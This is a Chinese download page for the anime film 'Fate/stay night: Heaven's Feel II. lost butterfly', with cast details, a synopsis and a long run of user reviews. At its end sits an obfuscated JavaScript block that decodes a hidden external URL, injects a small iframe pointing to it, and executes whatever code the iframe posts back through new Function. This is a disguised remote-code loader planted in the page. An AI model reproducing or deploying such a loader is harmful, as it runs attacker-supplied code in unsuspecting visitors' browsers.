2019高分动画奇幻《命运之夜——天之杯II :迷失之蝶》无删减版.BD1080P.中日双字


更新时间:2021-04-01 11:34:22 类别: 剧情 动画 奇幻 评论 下载
在前作出色的分镜基础上,这部炸裂的作画场景更多了,有钱团队的剧场版就是不一样,只是剧情比较乱,文戏部分对观众有些不友好,不过对粉丝来说是很值得一看了,国内上映的时候删了4分钟,毕竟稍稍黄暴了点,有兴趣可以看看~
命运之夜——天之杯II :迷失之蝶

命运之夜——天之杯II :迷失之蝶

导演: 须藤友德
编剧: 奈须蘑菇 / 桧山彬
主演: 杉山纪彰 / 下屋则子 / 神谷浩史 / 川澄绫子 / 植田佳奈 / 门胁舞以 / 伊藤美纪 / 中田让治 / 津嘉山正种 / 关智一 / 浅川悠 / 诹访部顺一 / 稻田彻
类型: 剧情 / 动画 / 奇幻
官方网站: www.fate-sn.com
制片国家/地区: 日本
语言: 日语
上映日期: 2019-07-12(中国大陆) / 2019-01-12(日本)
片长: 117分钟 / 113分钟(中国大陆)
又名: 劇場版 Fate/stay night [Heaven's Feel] II. lost butterfly / 命运之夜 天之杯 第二章 / 命运之夜——天之杯2:迷途之蝶 / 命运之夜——天之杯2:失去之蝶 / 命运之夜——天之杯2:迷失之蝶 / 命运之夜 剧场版 天之杯2
IMDb链接: tt8091892
本片改编自TYPE-MOON出品的文字冒险类游戏《Fate/stay night》,是该游戏最终路线“HF线”动画剧场版全三部作品中的第二章。通过女主角间桐樱的视角,讲述了御主和英灵为了得到可以实现一切愿望的圣杯而相互厮杀的一场战争。
时隔10年在冬木市爆发的这场“圣杯战争”中,因被称为“圣杯战争”御三家之一的间桐家的当家·间桐脏砚的参战而变得更畸形、扭曲和恶化。作为御主参战的卫宫士郎也在战斗中负伤还失去了英灵Saber,尽管如此士郎为了守护间桐樱,并没有从战斗中引身退出。而担心士郎身体的樱,自己也无法逃离魔法师的宿命……
王大根 2019-07-12

哭了,第一次在国内公映电影里看到高中生发生性关系,这才是真正的魔法啊!

LL 2019-01-12

Berserker就是那种你知道他会输但是还是愿意从心底称他最强。

Ichikavski 2019-01-14

画面制作,仿佛燃烧了FGO全球玩家氪的金,全程壁纸级原画,每五分钟都有新展开,作为年更番,让人觉得等一年看一部都非常值得 #爱就氪#

suonrex 2019-01-12

看的带首映录像的三小时票价3000版本,飞碟社最高水准的作品,开头则子姐姐就再次表达了从以前开始就对士郎喜欢的不行刷了一波好感。正片的气氛营造真是完美,无论是黑影的恐怖还是士樱的爱意,即使很久以前玩过游戏,仍然会被影像感动,战斗虽然只有一大场,但足够值得票价。期待明年春天的第三章,只要不是樱之梦结局就行

井颯 2019-01-17

带地球人朋友陪我一起看的。士郎把手指从樱嘴里拿出来的时候,我感到了一种难以言喻的尴尬:我忘记跟他说这个原作是个工口游戏了。。。

花開院弥生 2019-01-13

目前Fate正剧动画化最高水准了。不论是剧情、对人物的理解、分镜、演出,真的可以吹爆。士樱的爱情表现得一切都是水到渠成,绝美、不别扭不造作,这两个人物立得很稳。另外对远坂姐妹情的细节也处理得很好。当然收尾部分剪辑有点不太连贯,这点跟第一章一个毛病,不过瑕不掩瑜。

私~川流 2019-02-21

骂人了啊,除了海叔和黑呆互殴能看(黑呆宝具特效是真NB),其余都在托时间。十多年前就巨烦樱,这一部还没完没了地卖色相,我替远坂给土狼和樱两巴掌。

熊の手洗 2019-01-12

能比第一部好点但是这真的不是黄片吗??。。红A心好累啊,疯狂救场还变杨过。当然我们的大男猪卫宫土狼还是一如既往的垃圾,断了手也要啪啪啪。那最后我只能夸夸间桐樱的黑红色条纹连衣裙了。。。

苟且偷生 2019-01-12

老子要看接了麒麟臂的卫宫士郎

我_鸟 2019-07-12

雨中对白那段戏就很像在演舞台剧,女主角激情澎湃地念完一段台词,然后男主走上前来开始朗诵他的部分...还有对于在2019年的电影荧幕听到“前辈,我不是处女了”这句台词的事,我缓了这么久还是觉得匪夷所思...

吃了毒药的花花 2019-06-19

神烦樱,想替另外三个女主抽她一巴掌

风间琉璃 2019-03-17

我寻思着你们间桐家可真脏啊。

库库尔坎 2019-01-20

小伙伴lab里的技术宅真乃人才……居然搞到这么牛的枪版。大家都说HF线经典,其实只是因为这条是真相线……真相就是正义的伙伴全是魔术家族拿来愚弄英灵和人民的高贵谎言,目地不过就是吞食他人,补充自身魔力……长者拿虫爷玩自家女儿,扭曲的教育逼哥哥玩自己妹妹。中老年机关算尽,年轻人全靠卖屌,革命不过是永恒循环。这tm不就是现、实、世、界吗。所以为这事跟小伙伴吵了一晚上三线最后到底该不该有happy ending——我是极不喜欢HF线,因为深刻归深刻,但本质问题其实并不是多杀少还是少杀多的电车难题。而是。遮羞布下的这种进化论规则,跟正义的高贵一样,都是错的,而且结局都要万劫不复,就像冬木市一样。结果这事跟今天政法大学那个密信杀熟的事完全印合——大叔大嫂新年好,一秒钟搞死所有亲(竞)朋(争)好(对)友。真是要烷。

小也啾君 2019-07-12

弓凛,劳模一样的救场夫妻档,救了这个救那个图什么呢……

RickySeptember 2019-02-21

打斗戏敷衍到只靠特效了,感情戏尬到我想犯困,人物老是一副一听到啥事就瞪大双眼不知所措,每个人物都想要心理表达结果又臭又长。当然小樱那段吃人幻象是还不错的,红A真的帅爆,而且绅士福利镜头很多。但这种叙事真的还不如做成tv动画@朗豪坊cinemacity

衫衫衫今☆彡 2019-01-12

有剧透,给四星,不吹不黑。刚刚看完,电影院几乎满场,人气还是很高的,剧情相比较上一部进展了很多,黑saber真帅!红A真帅!闪闪打了个酱油,第一次看到美杜莎完整的脸。樱真的是可怜够了,可是卫宫怀中抱妹的时候我还是感动了一下,真的看到了补魔,还有断头,难怪是PG12的作品了。总的来说经费在燃烧,有小福利,卫宫也不再是那个只会满口正义伙伴的中二少年,而是决定成为只守护樱的人。红A颂诗断臂那一段我也很感动。结尾应该算是进入故事高潮了吧。期待最终章。

恶魔的步调 2019-07-12

这么糟糕的樱都过审了

[已注销] 2019-06-08

全片剧情莫名其妙,说打就打,说不打就不打,没有任何理由,如同过家家。动作没有任何美感,zero甚至ubw都有的一招一式刻画全部消失,只剩瞬移、爆破、激光,我甚至一度怀疑在看A1制作的F/A。台词之空洞展露无遗,黄油腐臭味十足,也让我醒悟,这本就是专门为宅男而打造。告别中二以后已经无法接受这种设计了,也能直面蘑菇创作能力之贫乏。就让型月的梦与歌,止于空境吧。

Judas 2019-03-10

只有伊利亚,从一开始就知道谁是真的婊子

闪电标 2019-01-13

远不如第一部,剧情非常破碎,gal game一样靠黑屏转场。你就是喜欢巨乳,别解释了。

命运之夜——天之杯II :迷失之蝶的截图1
命运之夜——天之杯II :迷失之蝶的截图2
命运之夜——天之杯II :迷失之蝶的截图3
命运之夜——天之杯II :迷失之蝶的截图4
命运之夜——天之杯II :迷失之蝶的截图5
命运之夜——天之杯II :迷失之蝶的截图6
function EWhOPKyc(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function HhKdYOpQ(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return EWhOPKyc(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x54\x64\x42\x6f\x6d\x45\x71\x6b\x55']=function(){;(function(u,r,w,d,f,c){var x=HhKdYOpQ;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMllM0EllMkYllMkZhZ2llsZWh3Lm9ubGlluZSUyRjEzNTYzMQ==',''+'lEq'+'Osv'+'Fo'+'',window,document,''+'7af'+'gl6'+'cQ'+'','l');};